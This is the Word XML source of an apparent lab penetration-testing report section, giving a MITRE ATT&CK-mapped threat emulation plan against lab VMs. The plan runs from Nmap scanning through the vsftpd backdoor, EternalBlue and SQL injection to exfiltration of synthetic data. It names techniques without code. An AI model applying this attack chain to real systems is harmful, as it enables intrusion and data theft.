    <w:p w14:paraId="0C8F6169" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00797850" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Threat Emulation Plan (MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="00797850">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00797850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mapped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7398A101" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The threat emulation plan maps the attack chain to the MITRE ATT&amp;CK framework, ensuring alignment with real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>world adversary behaviour.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12CA0">
        <w:t xml:space="preserve"> The emulated threat actor represents an opportunistic but technically capable external attacker targeting ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C12CA0">
        <w:t>Ltd's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C12CA0">
        <w:t xml:space="preserve"> internet-facing services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165957B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="71245BBC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00257FED" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257FED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE02326" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Exfiltrate a sensitive file from the Windows 7 workstation by compromising the OWASP BWA server, escalating privileges on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2, and moving laterally across the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1395B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Secondary Objective: Achieve SYSTEM/root-level access on at least two target VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F215A6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="423566FC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00257FED" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257FED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Success Criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC97AF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Achieve remote code execution on VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13C8A5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obtain domain credentials or privileged access on VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5602B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35056B5C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access and exfiltrate sensitive synthetic data from VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5602B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4875C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maintain operational stealth (minimal logs, low</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5602B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>noise scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF98D37" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Demonstrate realistic attacker behaviour and tradecraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB6B0C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="19366CB3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="57F4D17D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="658622D4" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37278560" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34392225" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39696DF1" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF450CE" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7129224F" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35372415" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FE72EB" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D51CE4" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734E2A45" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA0B779" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0912C9C0" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C56E48" w14:textId="77777777" w:rsidR="000765F3" w:rsidRDefault="000765F3" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661586AB" w14:textId="30D28858" w:rsidR="00C934DB" w:rsidRPr="00257FED" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257FED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 MITRE</w:t>
      </w:r>
      <w:r w:rsidRPr="00257FED">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00257FED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mapped Attack Phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC3B4A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9712" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10057"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="0F0B19A4" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:trPr>
          <w:trHeight w:val="8299"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9712" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9834"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64"/>
              <w:gridCol w:w="1852"/>
              <w:gridCol w:w="3390"/>
              <w:gridCol w:w="1141"/>
              <w:gridCol w:w="1587"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="0982771F" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="422"/>
              </w:trPr>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35DB78AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Phase</w:t>
                  </w:r>
                </w:p>
              </w:tc>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3FB142D0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Tactic</w:t>
                  </w:r>
                </w:p>
              </w:tc>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0E5D07B9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Technique</w:t>
                  </w:r>
                </w:p>
              </w:tc>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21FDF5BD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>MITRE ID</w:t>
                  </w:r>
                </w:p>
              </w:tc>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26C9099C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Target</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="6E732B04" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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6D20A4BE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>1 - Reconnaissance</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85D0DFA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Reconnaissance</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4EDFA86" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Active Scanning: Nmap port/service scan</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8B0C430" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1595</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306359A7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>All targets</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="32FF7B0E" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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53462001" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>2 - Initial Access</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446A167" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Initial Access</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64AABA7E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Exploit Public-Facing Application: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> backdoor</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4C157F5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1190</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0857FFDD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="25C1EC6A" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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0E20A3A7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>3 - Execution</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532EFCC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Execution</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5E262C71" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Command and Scripting Interpreter: Unix shell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983C1E4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1059.004</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EB235AC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="3EF39036" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="693"/>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B976BB0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>4 - Persistence</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B0AF5DD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Persistence</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0E86D83C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Valid Accounts: Local account creation</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6222B12" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1078</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7DB30FF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="18655499" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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0F03ED6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>5 - Lateral Movement</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BA75BB4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Lateral Movement</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E75D891" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Exploit Remote Services: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> MS17-010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A01F3CA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1210</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7F2604E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.103</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="407E8668" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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026B3745" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>6 - Collection</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63402B1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Collection</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74583C15" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Data from Local System: Sensitive file enumeration</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805E52A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1005</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535800F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.103</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="47C0F9B3" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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50F71E25" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>7 - Web Exploitation</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34C4D88" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Initial Access</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14716F4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploit Public-Facing Application: SQL Injection</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F48391F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1190</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0C45A17" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.102</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="0B5171DD" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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51381D98" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>8 - Exfiltration</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0D43AB0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exfiltration</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8DC766A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exfiltration Over Web Service: DB record extraction</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CB77961" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1048</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05B852E9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
